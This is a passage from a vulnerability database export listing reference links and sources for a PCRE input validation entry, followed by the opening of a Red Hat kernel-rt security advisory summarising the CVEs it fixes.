"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20095"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-42771"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-28493"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43818"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38593"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24921"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23648"
},
{
"trust": 0.1,
"url": "https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5069"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29162"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3672"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1621"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://10.0.0.7:2379"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1706"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4115"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4373"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4914"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26301"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28957"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20095"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28493"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13950"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17567"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35452"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17567"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35452"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-15T00:00:00",
"db": "VULHUB",
"id": "VHN-167005"
},
{
"date": "2022-08-10T15:56:22",
"db": "PACKETSTORM",
"id": "168042"
},
{
"date": "2021-11-10T17:02:34",
"db": "PACKETSTORM",
"id": "164825"
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631"
},
{
"date": "2021-12-03T16:41:45",
"db": "PACKETSTORM",
"id": "165135"
},
{
"date": "2021-12-02T16:06:16",
"db": "PACKETSTORM",
"id": "165129"
},
{
"date": "2021-11-29T18:12:32",
"db": "PACKETSTORM",
"id": "165096"
},
{
"date": "2021-11-11T14:53:11",
"db": "PACKETSTORM",
"id": "164927"
},
{
"date": "2022-02-04T17:26:39",
"db": "PACKETSTORM",
"id": "165862"
},
{
"date": "2020-06-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"date": "2020-06-15T17:15:10.777000",
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-167005"
},
{
"date": "2023-07-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"date": "2024-11-21T05:02:45.440000",
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "PCRE Input validation error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
}
],
"trust": 0.6
}
}
VAR-202103-0287
Vulnerability from variot - Updated: 2026-03-09 21:38A flaw possibility of race condition and incorrect initialization of the process id was found in the Linux kernel child/parent process identification handling while filtering signal handlers. A local attacker is able to abuse this flaw to bypass checks to send any signal to a privileged process. Linux Kernel Contains an initialization vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2021:1739-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1739 Issue date: 2021-05-18 CVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431 CVE-2020-11608 CVE-2020-12114 CVE-2020-12362 CVE-2020-12464 CVE-2020-14314 CVE-2020-14356 CVE-2020-15437 CVE-2020-24394 CVE-2020-25212 CVE-2020-25284 CVE-2020-25285 CVE-2020-25643 CVE-2020-25704 CVE-2020-27786 CVE-2020-27835 CVE-2020-28974 CVE-2020-35508 CVE-2021-0342 ==================================================================== 1. Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64 Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
-
kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver (CVE-2019-19523)
-
kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver (CVE-2019-19528)
-
kernel: possible out of bounds write in kbd_keycode of keyboard.c (CVE-2020-0431)
-
kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)
-
kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c (CVE-2020-12464)
-
kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)
-
kernel: Use After Free vulnerability in cgroup BPF component (CVE-2020-14356)
-
kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c (CVE-2020-15437)
-
kernel: umask not applied on filesystem without ACL support (CVE-2020-24394)
-
kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)
-
kernel: incomplete permission checking for access to rbd devices (CVE-2020-25284)
-
kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c (CVE-2020-25285)
-
kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow (CVE-2020-25643)
-
kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)
-
kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)
-
kernel: child process is able to access parent mm through hfi dev file handle (CVE-2020-27835)
-
kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)
-
kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting
-
->real_parent (CVE-2020-35508)
-
kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege (CVE-2021-0342)
-
kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
